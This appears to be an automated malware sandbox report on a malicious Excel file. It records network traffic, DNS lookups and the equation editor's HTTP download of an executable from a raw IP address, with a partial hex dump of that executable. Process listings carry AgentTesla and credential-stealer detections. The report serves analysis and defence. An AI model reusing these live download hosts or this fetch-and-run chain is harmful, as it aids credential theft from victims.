                                              Nov 20, 2020 13:47:41.042495966 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042516947 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042526960 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042556047 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042577982 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042593002 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042612076 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042630911 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042634964 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042681932 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.045330048 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163393021 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163455963 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163505077 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163544893 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163583040 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163620949 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163623095 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163661957 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163661957 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163678885 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163700104 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163714886 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163744926 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163747072 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163791895 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163805962 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163829088 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163841963 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163867950 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163881063 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163906097 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163921118 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163944006 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163948059 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163988113 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163994074 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164030075 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164038897 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164081097 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164082050 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164122105 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164130926 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164158106 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164172888 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164196968 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164199114 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164235115 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164252043 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164272070 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164289951 CET4916780192.168.2.22198.23.212.152

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 20, 2020 13:49:16.522818089 CET5219753192.168.2.228.8.8.8
                                              Nov 20, 2020 13:49:16.558728933 CET53521978.8.8.8192.168.2.22
                                              Nov 20, 2020 13:49:16.575975895 CET5309953192.168.2.228.8.8.8
                                              Nov 20, 2020 13:49:16.603087902 CET53530998.8.8.8192.168.2.22
                                              Nov 20, 2020 13:49:17.635116100 CET5283853192.168.2.228.8.8.8
                                              Nov 20, 2020 13:49:17.672498941 CET53528388.8.8.8192.168.2.22
                                              Nov 20, 2020 13:49:17.685904980 CET6120053192.168.2.228.8.8.8
                                              Nov 20, 2020 13:49:17.715544939 CET53612008.8.8.8192.168.2.22
                                              Nov 20, 2020 13:49:20.742588043 CET4954853192.168.2.228.8.8.8
                                              Nov 20, 2020 13:49:20.781419039 CET53495488.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 20, 2020 13:49:16.522818089 CET192.168.2.228.8.8.80x2d02Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.575975895 CET192.168.2.228.8.8.80xecd9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:20.742588043 CET192.168.2.228.8.8.80x6937Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.42.25A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.153.147A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.164.148A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.169.28A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com184.73.247.141A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.161.145A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.126.66A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.558728933 CET8.8.8.8192.168.2.220x2d02No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.142.93A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.42.25A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.153.147A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.164.148A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.169.28A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com184.73.247.141A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.161.145A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.126.66A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:16.603087902 CET8.8.8.8192.168.2.220xecd9No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.142.93A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:20.781419039 CET8.8.8.8192.168.2.220x6937No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:20.781419039 CET8.8.8.8192.168.2.220x6937No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:20.781419039 CET8.8.8.8192.168.2.220x6937No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                              Nov 20, 2020 13:49:20.781419039 CET8.8.8.8192.168.2.220x6937No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 198.23.212.152

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249167198.23.212.15280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Nov 20, 2020 13:47:40.685847044 CET0OUTGET /doc/tochi.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 198.23.212.152
                                              Connection: Keep-Alive
                                              Nov 20, 2020 13:47:40.805413961 CET1INHTTP/1.1 200 OK
                                              Date: Fri, 20 Nov 2020 12:47:40 GMT
                                              Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                              Last-Modified: Fri, 20 Nov 2020 07:43:07 GMT
                                              ETag: "97200-5b484fece2d5f"
                                              Accept-Ranges: bytes
                                              Content-Length: 619008
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 71 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 6a 09 00 00 06 00 00 00 00 00 00 ce 89 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 09 f1 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 89 09 00 4f 00 00 00 00 a0 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 69 09 00 00 20 00 00 00 6a 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 09 00 00 04 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 89 09 00 00 00 00 00 48 00 00 00 02 00 05 00 78 e9 08 00 04 a0 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 88 77 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 29 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7b 63 00 00 0a 02 7b 62 00 00 0a 6f 5a 00 00 0a 28 5e 00 00 0a 2a 2e 73 6f 00 00 0a 80 70 00 00 0a 2a 1e 03 6f 71 00 00 0a 2a 56 02 7b 11 00 00 04 6f 64 00 00 0a 03 28 12 00 00 2b 16 fe 01 2a 4a 02 7b 12 00 00 04 6f 31 00 00 0a 03 6f 76 00 00 0a 2a 4a 03 02 7b 13 00 00 04 6f
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELq_j @ @|OB H.texti j `.rsrcBl@@.relocp@BHxqwabdcefghijklmnprqstuvwzyx0123456789ABCDEFGHIJKLMNQPRTSVUWXYZ6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.r)p*6{b(^*o{a{c{boZ(^*.sop*oq*V{od(+*J{o1ov*J{o


                                              HTTPS Packets

                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                              Nov 20, 2020 13:49:16.885310888 CET23.21.42.25443192.168.2.2249168CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue Jan 19 01:00:00 CET 2010Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Tue Jan 19 00:59:59 CET 2038771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                              CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029
                                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Jan 19 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038

                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:13:46:44
                                              Start date:20/11/2020
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f0c0000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:13:47:04
                                              Start date:20/11/2020
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:13:47:09
                                              Start date:20/11/2020
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x1010000
                                              File size:619008 bytes
                                              MD5 hash:C11D6124EE0522C7AB71D20CF3474DC0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2167794246.0000000000462000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2170414969.0000000004127000.00000004.00000001.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Disassembly

                                              Code Analysis

                                              Reset < >